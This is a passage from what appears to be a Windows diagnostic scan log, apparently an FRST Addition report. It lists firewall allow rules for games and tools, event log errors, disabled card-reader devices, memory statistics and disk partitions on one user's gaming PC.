FirewallRules: [TCP Query User{A074EB64-5286-4924-AA51-A6CE528D0685}D:\program files (x86)\renegade x\binaries\win32\udk.exe] => (Allow) D:\program files (x86)\renegade x\binaries\win32\udk.exe
FirewallRules: [UDP Query User{1F2F085C-B4E1-4DA1-98F2-65F507FCBD4D}D:\program files (x86)\renegade x\binaries\win32\udk.exe] => (Allow) D:\program files (x86)\renegade x\binaries\win32\udk.exe
FirewallRules: [TCP Query User{5B5B90E1-B4B9-4E26-9A64-3F9AE8AAA65A}D:\program files (x86)\steam\steamapps\common\grand theft auto iv\gtaiv\gtaiv.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\grand theft auto iv\gtaiv\gtaiv.exe
FirewallRules: [UDP Query User{729FBE94-7305-42EF-BCCB-68E73EC15DB0}D:\program files (x86)\steam\steamapps\common\grand theft auto iv\gtaiv\gtaiv.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\grand theft auto iv\gtaiv\gtaiv.exe
FirewallRules: [{4B98E4CE-5605-4563-BDA1-7205A2EC56F8}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{A1933344-6700-41EE-BB83-4A170D2E5581}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [TCP Query User{FC876441-D452-48FB-B1A5-3135EDD120DB}D:\program files (x86)\steam\steamapps\common\total war attila\attila.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\total war attila\attila.exe
FirewallRules: [UDP Query User{692AC8BE-EF29-42C9-A015-8DF06A929944}D:\program files (x86)\steam\steamapps\common\total war attila\attila.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\total war attila\attila.exe
FirewallRules: [{C925ACC9-0F56-4899-A031-8E8D3B86E061}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{43A77342-C5F6-4D8B-B9FD-06EF79FEA828}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{E514ED43-6BF3-462A-BFE9-D5C9E485D9C4}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{60F1D7EC-B8E4-4418-AF91-BC9C14A58ADE}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{2ED9C384-7BB6-482C-83D1-0A1A5BCF10E7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9358AB1F-9A7C-4124-8BCA-AD912B32DF5D}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{29F23503-30F1-4C59-9C81-970C456CC529}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [{A0CC1B38-BC1A-44EA-AD20-05ABB1B8CB5F}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [TCP Query User{F4D34E10-C30B-41D2-A948-D0FE9D13C9E8}D:\origin games\battlefield 4\bf4.exe] => (Allow) D:\origin games\battlefield 4\bf4.exe
FirewallRules: [UDP Query User{B1142789-CD51-47E1-B112-81810BF39DA5}D:\origin games\battlefield 4\bf4.exe] => (Allow) D:\origin games\battlefield 4\bf4.exe
FirewallRules: [{40E87360-9770-4735-B681-F6377E9A4DA6}] => (Allow) D:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{7098821B-6214-49A2-BA17-73EFE2A7A33A}] => (Allow) D:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{74D0FEC3-DAE8-4EEB-BDE7-2B29C2B1CD70}] => (Allow) D:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4_x64.exe
FirewallRules: [{91F0D73A-E551-4642-843B-F3C68DF58936}] => (Allow) D:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4_x64.exe
FirewallRules: [{38037FE9-15F0-44AF-98E0-3D81DA7A8A07}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\SourceSDK\bin\SDKLauncher.exe
FirewallRules: [{7FDD561F-80BE-4840-9435-DD21909F0A34}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\SourceSDK\bin\SDKLauncher.exe
FirewallRules: [{CD870190-F2C9-43A3-83D3-32FEF48C8C58}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Metal Gear Solid Ground Zeroes\MgsGroundZeroes.exe
FirewallRules: [{3DA91CA3-8920-40C9-A6D7-BF2167E624E6}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Metal Gear Solid Ground Zeroes\MgsGroundZeroes.exe
FirewallRules: [{3D41DF92-FA5A-452D-B5DB-6F40659E7DDA}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [{2D6440AB-8BA2-4AC3-9094-733299841015}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [TCP Query User{F188874E-1A65-4490-AEFB-6A8461B571BF}D:\program files (x86)\steam\steamapps\common\beamng.drive\bin64\beamng.drive.x64.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\beamng.drive\bin64\beamng.drive.x64.exe
FirewallRules: [UDP Query User{8B0EA685-274D-41AA-A34F-0F9157EFDBEB}D:\program files (x86)\steam\steamapps\common\beamng.drive\bin64\beamng.drive.x64.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\beamng.drive\bin64\beamng.drive.x64.exe
FirewallRules: [{9103A96B-2EA8-4AB9-AA30-F288EE0BF689}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FaceRig\Bin\Launcher.exe
FirewallRules: [{7D730C60-C0FF-4442-AF17-3C37D543844C}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FaceRig\Bin\Launcher.exe
FirewallRules: [{B5910554-40B8-4DE9-A5C2-F49234ECF0F4}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FaceRig\Bin\FaceRig.exe
FirewallRules: [{C5D87D51-6F93-4046-92C7-910F456DA72F}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FaceRig\Bin\FaceRig.exe
FirewallRules: [TCP Query User{C5D37B21-A5BD-42A1-B357-AB100A8AB3CD}D:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe
FirewallRules: [UDP Query User{152905EB-21F8-43DD-87D1-9C7ABFCB7C7C}D:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe
FirewallRules: [{2BD69BB9-2B5E-4DC6-B0E2-BD03A05BF901}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio Tools for Unity\2015\UnityVS.OpenFile.exe
FirewallRules: [{B785C9CD-4C1D-47AA-8A5B-9EFD4AAB66AD}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [{1EAC6653-8EE1-4F96-A95A-9877826756CB}] => (Allow) D:\PROGRA~1\Unity\Editor\Unity.exe
FirewallRules: [{4FC44E3D-3D60-4F19-AF3B-02FE0480A259}] => (Allow) D:\Origin Games\Battlefield 4\BF4WebHelper.exe
FirewallRules: [{5C3AB47C-7AA7-4968-8462-A171EF393080}] => (Allow) D:\Origin Games\Battlefield 4\BF4WebHelper.exe
FirewallRules: [{E9F07661-9F53-43A4-A452-531AC1CEB541}] => (Allow) D:\Origin Games\Battlefield 4\BF4X86WebHelper.exe
FirewallRules: [{5EF89873-63F2-4D40-A439-A7C29B7AA621}] => (Allow) D:\Origin Games\Battlefield 4\BF4X86WebHelper.exe
FirewallRules: [{3FDF76EC-035D-498D-876C-A537762CD874}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\DOOM 3 BFG Edition\Doom3BFG.exe
FirewallRules: [{7BF3CE78-6EAB-434C-BC9A-8E2BD95BF60D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\DOOM 3 BFG Edition\Doom3BFG.exe
FirewallRules: [{A3C56F52-9E98-42B8-BED6-09580F327F25}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\PapersPlease\PapersPlease.exe
FirewallRules: [{30A1F1DA-FD59-47A8-B576-0C492D82E160}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\PapersPlease\PapersPlease.exe
FirewallRules: [TCP Query User{F0C97EFB-452F-4958-8C8A-7A55D0380509}D:\program files (x86)\eldewrito_0.5.0.2_release\eldorado.exe] => (Allow) D:\program files (x86)\eldewrito_0.5.0.2_release\eldorado.exe
FirewallRules: [UDP Query User{986DA3C3-C8B5-4953-9A05-824057A22EFE}D:\program files (x86)\eldewrito_0.5.0.2_release\eldorado.exe] => (Allow) D:\program files (x86)\eldewrito_0.5.0.2_release\eldorado.exe
FirewallRules: [TCP Query User{795E78CC-E1F3-4524-99B3-263752F6AEB5}D:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) D:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [UDP Query User{7495E0A7-780B-4F01-833E-8AE9F5E38F8E}D:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) D:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [TCP Query User{D09C62B2-3BDE-4046-BF07-06C16C759A4C}C:\users\king\desktop\wartektest\wartektest.exe] => (Allow) C:\users\king\desktop\wartektest\wartektest.exe
FirewallRules: [UDP Query User{32CAFB35-B398-4F7D-8529-A625C19EDC46}C:\users\king\desktop\wartektest\wartektest.exe] => (Allow) C:\users\king\desktop\wartektest\wartektest.exe
FirewallRules: [{4621F120-C108-4D42-AA58-2BE1C7967CDF}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Undertale\UNDERTALE.exe
FirewallRules: [{3B1F230B-CE04-4151-81E2-DD63704EDE93}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Undertale\UNDERTALE.exe
FirewallRules: [{1666070A-8FDE-483B-9427-FC9A0006573F}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\launcher\launcher.exe
FirewallRules: [{82705416-5843-4A35-9BD6-5BF0760BD707}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\launcher\launcher.exe
FirewallRules: [{E815DFA6-164B-453F-B3EC-55B1563168DC}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Total War Attila\launcher\launcher.exe
FirewallRules: [{C0A151B1-242E-4952-BA47-E9DEBBD4119B}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Total War Attila\launcher\launcher.exe
FirewallRules: [{F7D2C050-3B60-4C84-BDC1-2DCC4D378BC4}] => (Allow) C:\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\bin\SDKLauncher.exe
FirewallRules: [{DA40A903-4497-4A5A-9CFB-02083DBE6AD1}] => (Allow) C:\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\bin\SDKLauncher.exe
FirewallRules: [{9B1E9324-1C44-48C8-BF66-42EDD9C61B4E}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [{3D74C46D-19F5-40F5-89AD-B3DE9C1CE6AF}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [TCP Query User{56BC8A14-6879-4CD0-9B23-BE1FB3F04381}D:\program files (x86)\mouseserver\mouseserver.exe] => (Allow) D:\program files (x86)\mouseserver\mouseserver.exe
FirewallRules: [UDP Query User{7A65D2E2-3D32-4EA0-9E00-6AD3D87D6EA1}D:\program files (x86)\mouseserver\mouseserver.exe] => (Allow) D:\program files (x86)\mouseserver\mouseserver.exe
FirewallRules: [TCP Query User{BDF62674-5243-4FE3-9FBC-6BCACE00FA9C}D:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) D:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [UDP Query User{BFEC6B6E-0C27-4309-A8F9-373BCAED5FF8}D:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) D:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [TCP Query User{242D8FC0-D479-4CF0-B417-D4D9C90EE401}C:\users\king\desktop\wartektest\wartektest.exe] => (Allow) C:\users\king\desktop\wartektest\wartektest.exe
FirewallRules: [UDP Query User{AFE96390-E093-42C2-8A69-1A902BC7994B}C:\users\king\desktop\wartektest\wartektest.exe] => (Allow) C:\users\king\desktop\wartektest\wartektest.exe
FirewallRules: [{5EDD6C14-1F0B-4B09-82AB-9AC384B3D074}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{D61FEDF3-9B75-4B29-AAB2-C9A6DAF5E3A3}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{F6AE6107-BECB-4B8D-AB2F-B9344FB35E56}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\launcher\launcher.exe
FirewallRules: [{09091FC7-8756-483A-88EE-89B663BCBEEA}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\launcher\launcher.exe
FirewallRules: [TCP Query User{3FB29C6D-88CF-4C21-BA7D-67569853204B}D:\program files (x86)\overwatch\overwatch.exe] => (Allow) D:\program files (x86)\overwatch\overwatch.exe
FirewallRules: [UDP Query User{66C34F60-AB38-4060-B6BA-05DCCA6DB008}D:\program files (x86)\overwatch\overwatch.exe] => (Allow) D:\program files (x86)\overwatch\overwatch.exe
FirewallRules: [{642D33F3-E4FA-4D58-8F21-3E8355951D09}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
FirewallRules: [{C3DBDC07-31E8-4357-B18D-A0F6952F1944}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
FirewallRules: [{01AA7BCF-E31D-4555-86AA-C44838D38197}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouseCore.exe
FirewallRules: [{82FAD941-004E-4FAE-86E6-C615A80E976F}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouseCore.exe
FirewallRules: [TCP Query User{0A9B801D-E1CA-4639-AAA3-ADF25EA6C3DB}D:\program files (x86)\america's army\system\armyops.exe] => (Allow) D:\program files (x86)\america's army\system\armyops.exe
FirewallRules: [UDP Query User{87AE82B1-7EF6-4780-AE24-C757230B83FD}D:\program files (x86)\america's army\system\armyops.exe] => (Allow) D:\program files (x86)\america's army\system\armyops.exe
FirewallRules: [{0A7316F5-5445-49D6-BFD7-1378C5268862}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Strong Badia the Free\Homestar102.exe
FirewallRules: [{4B62398C-6061-4411-9BF0-F212F00DFF16}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Strong Badia the Free\Homestar102.exe
FirewallRules: [{6BDD5D8F-F571-4856-823D-3CBFF0DA2297}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Total War Attila\launcher\launcher.exe
FirewallRules: [{AEB4236C-3170-4433-98C8-A177E6B35B4A}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Total War Attila\launcher\launcher.exe
FirewallRules: [{7EC6162B-37A6-4D7F-A454-5E587F431807}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FarCry\Bin32\FarCry.exe
FirewallRules: [{8A74542F-AEFF-437A-A980-F673B123276B}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FarCry\Bin32\FarCry.exe
FirewallRules: [{80D267BF-66CF-473D-B1B5-93B01F308E83}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FarCry\Bin32\FarCryConfigurator.exe
FirewallRules: [{7AF1E35D-E2AD-4685-9D24-5FBBECE5F495}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\FarCry\Bin32\FarCryConfigurator.exe
FirewallRules: [{06BFB38F-037F-44C1-AF74-B264017A471F}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ESEA Premium\eseaclientsteam.exe
FirewallRules: [{14C061E1-E8C4-4F99-82FF-C89DF80D99F8}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ESEA Premium\eseaclientsteam.exe
FirewallRules: [{74632AA7-5F19-448F-99E3-1BFAD48FE3BD}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\mod_uploader.exe
FirewallRules: [{194EAC41-5CB2-4530-AD7C-7A2EC6366E95}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\mod_uploader.exe
FirewallRules: [{E5021CF3-386F-404E-87F6-43BFA91BC092}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win32\mod_uploader.exe
FirewallRules: [{FFB0928C-20BE-4A7E-8D08-C359EE3F6BF7}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win32\mod_uploader.exe
FirewallRules: [{1A2668A2-A1CE-4E95-8EE4-D83B1F68FD26}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [{0DD35EB4-F01D-43DF-986F-143DB433577D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [{C55A8E05-A470-41B9-B426-242CFBFA82E0}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Crysis\Bin32\Crysis.exe
FirewallRules: [{61FAC0FC-4D85-4624-90F1-1B19B2CE5921}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Crysis\Bin32\Crysis.exe
FirewallRules: [{C1902DEC-91C0-436A-B467-6F7DA36F6255}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win64\starbound.exe
FirewallRules: [{21E97A04-D9E3-44C9-8CD7-CD3AFE8A0201}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win64\starbound.exe
FirewallRules: [{EF2055BF-735A-44F5-953A-9DA84028A66D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win64\starbound_server.exe
FirewallRules: [{6435999F-264B-420F-B64B-200E214C85A5}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win64\starbound_server.exe
FirewallRules: [{9A9323FF-4B01-4149-99AC-89A392359115}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win64\mod_uploader.exe
FirewallRules: [{57BACA16-0FCF-4AD7-8D4A-204FC43344FE}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win64\mod_uploader.exe
FirewallRules: [{F22CE19B-9651-4970-B538-D4C1C63CDF27}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\starbound.exe
FirewallRules: [{57C9F604-7BAC-4A12-A0F8-5AF334FD441D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound - Unstable\win32\starbound.exe
FirewallRules: [{B7A39006-CB31-40A1-A999-1E69B6B523E0}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win64\starbound.exe
FirewallRules: [{B5B2BB46-53B3-4955-AED1-2EF7D5E19AD5}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win64\starbound.exe
FirewallRules: [{DFB07565-6108-40F6-83AF-0F2B4AA4D392}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win64\starbound_server.exe
FirewallRules: [{3C42DB7B-1C91-4318-96FD-456E664CED93}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win64\starbound_server.exe
FirewallRules: [{4B45D1E0-245A-4AC8-9BCD-DA9F5A42E72F}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win64\mod_uploader.exe
FirewallRules: [{24EB6943-07F8-4561-B589-EDE104448B2D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win64\mod_uploader.exe
FirewallRules: [{DBF1D8B2-C781-4C1C-B0A1-D74D56B55C4D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win32\starbound.exe
FirewallRules: [{4E1E669D-CB37-4A5C-B923-5FEDDBB568B6}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Starbound\win32\starbound.exe
FirewallRules: [{6D934F2A-C194-4155-8ADB-70B95EA39AE4}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{7232D68A-B522-45F1-89A6-33738D0DF56B}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{B5D290D2-1611-4859-A938-4ACE6AE2202C}] => (Allow) C:\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\bin\SDKLauncher.exe
FirewallRules: [{AF8BD274-E406-4257-87B3-ED85EC02AACD}] => (Allow) C:\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\bin\SDKLauncher.exe
StandardProfile\AuthorizedApplications: [D:\Program Files (x86)\TriDef 3D\TriDef\TriDefMediaPlayer\TriDefMediaPlayer.exe] => Enabled:TriDef 3D Media Player

==================== Restore Points =========================

12-10-2016 03:00:11 Windows Update
13-10-2016 03:00:17 Windows Update
17-10-2016 13:57:59 Windows Update

==================== Faulty Device Manager Devices =============

Name: Generic USB SM Reader USB Device
Description: Disk drive
Class Guid: {4d36e967-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard disk drives)
Service: disk
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Generic USB CF Reader USB Device
Description: Disk drive
Class Guid: {4d36e967-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard disk drives)
Service: disk
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Generic USB MS Reader USB Device
Description: Disk drive
Class Guid: {4d36e967-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard disk drives)
Service: disk
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (10/19/2016 04:05:35 PM) (Source: OVRServiceLauncher) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/19/2016 04:00:53 PM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/18/2016 04:37:50 PM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/17/2016 01:46:50 PM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/16/2016 09:44:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: steamwebhelper.exe, version: 3.65.13.80, time stamp: 0x57fed9f2
Faulting module name: steamwebhelper.exe, version: 3.65.13.80, time stamp: 0x57fed9f2
Exception code: 0xc0000005
Fault offset: 0x00037b59
Faulting process id: 0x1934
Faulting application start time: 0x01d2269484669b2a
Faulting application path: D:\Program Files (x86)\steam\bin\cef\cef.winxp\steamwebhelper.exe
Faulting module path: D:\Program Files (x86)\steam\bin\cef\cef.winxp\steamwebhelper.exe
Report Id: 57bb53c2-9424-11e6-ad65-485b3912dc4d

Error: (10/16/2016 09:46:52 AM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/15/2016 02:45:12 PM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/15/2016 09:16:44 AM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/14/2016 08:24:36 PM) (Source: OVRServiceLauncher) (EventID: 0) (User: )
Description: Event-ID 0

Error: (10/14/2016 04:43:51 PM) (Source: OculusVR) (EventID: 0) (User: )
Description: Event-ID 0


System errors:
=============
Error: (10/19/2016 04:06:36 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID 
{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}
 and APPID 
{344ED43D-D086-4961-86A6-1106F4ACAD9B}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.

Error: (10/19/2016 04:05:36 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
iaStor

Error: (10/19/2016 04:05:35 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The ZoneAlarm Privacy Service service failed to start due to the following error: 
The system cannot find the file specified.

Error: (10/19/2016 04:05:32 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 4:03:59 PM on ‎10/‎19/‎2016 was unexpected.

Error: (10/14/2016 08:25:38 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID 
{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}
 and APPID 
{344ED43D-D086-4961-86A6-1106F4ACAD9B}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.

Error: (10/14/2016 08:24:38 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
iaStor

Error: (10/14/2016 08:24:36 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The ZoneAlarm Privacy Service service failed to start due to the following error: 
The system cannot find the file specified.

Error: (10/13/2016 10:44:00 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Steam Client Service service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.

Error: (10/13/2016 10:44:00 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Steam Client Service service to connect.

Error: (10/13/2016 08:20:00 PM) (Source: cdrom) (EventID: 15) (User: )
Description: The device, \Device\CdRom2, is not ready for access yet.


CodeIntegrity:
===================================
  Date: 2015-10-17 00:11:02.687
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-10-17 00:11:02.634
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-10-17 00:11:02.580
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-10-17 00:11:02.526
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-06-04 01:58:45.705
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-06-04 01:58:45.666
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info =========================== 

Processor: Intel(R) Xeon(R) CPU X5670 @ 2.93GHz
Percentage of memory in use: 30%
Total physical RAM: 12279.11 MB
Available physical RAM: 8562.06 MB
Total Virtual: 21479.3 MB
Available Virtual: 16377.64 MB

==================== Drives ================================

Drive c: (SYSTEM SSD) (Fixed) (Total:223.57 GB) (Free:38.5 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: () (Fixed) (Total:931.51 GB) (Free:393.08 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (STORAGE) (Fixed) (Total:1863.01 GB) (Free:1560.55 GB) NTFS
Drive f: (RECORDING SSD) (Fixed) (Total:55.9 GB) (Free:29.19 GB) NTFS
Drive r: (RAPTOR) (Fixed) (Total:139.73 GB) (Free:42.53 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 223.6 GB) (Disk ID: CF682E61)
Partition 1: (Active) - (Size=223.6 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 139.7 GB) (Disk ID: D62865BE)
Partition 1: (Not Active) - (Size=139.7 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 2A68EE0B)
Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 3 (MBR Code: Windows 7 or 8) (Size: 55.9 GB) (Disk ID: 567706EE)
Partition 1: (Not Active) - (Size=55.9 GB) - (Type=07 NTFS)

========================================================
Disk: 4 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: D652185A)
